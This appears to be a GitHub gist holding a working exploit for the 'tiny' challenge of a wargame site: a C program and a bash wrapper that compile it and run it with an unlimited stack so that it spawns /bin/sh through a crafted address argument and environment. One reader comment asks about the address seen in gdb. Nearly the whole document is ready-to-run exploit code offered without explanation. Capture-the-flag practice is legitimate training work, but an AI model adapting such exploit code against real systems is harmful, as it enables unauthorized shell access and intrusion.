/pwnable-hackerssecret-tiny.c
Last active Jul 18, 2016
Run pwnable-hackerssecret-tiny.sh and you'll pwn the tiny.
| #include <stdio.h> | |
| #include <unistd.h> | |
| int main() | |
| { | |
| char *envp[] = { | |
| "env1=1", "env2=2", "env3=3", | |
| "/bin/sh", "env5=5", NULL | |
| }; | |
| execle("/home/tiny/tiny", "\xc8\x75\x55\x55", | |
| "A", "A", "A", "A", "A", "A", | |
| "A", "A", "A", "A", NULL, envp); | |
| return 0; | |
| } |
| #!/usr/bin/env bash | |
| tempfile=$(mktemp -d) | |
| echo $tempfile | |
| cd $tempfile | |
| gcc -xc - -oexp <<\EOF | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| int main() | |
| { | |
| char *envp[] = { | |
| "env1=1", "env2=2", "env3=3", | |
| "/bin/sh", "env5=5", NULL | |
| }; | |
| execle("/home/tiny/tiny", "\xc8\x75\x55\x55", | |
| "A", "A", "A", "A", "A", "A", | |
| "A", "A", "A", "A", NULL, envp); | |
| return 0; | |
| } | |
| EOF | |
| ulimit -s unlimited | |
| exec ./exp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Shviderskiy commentedJul 18, 2016
Hi! I have a small question.
Why execve accepts strange second parameter?
During debugging my gdb shows 0xf77??5c8, but 0x555575c8 never.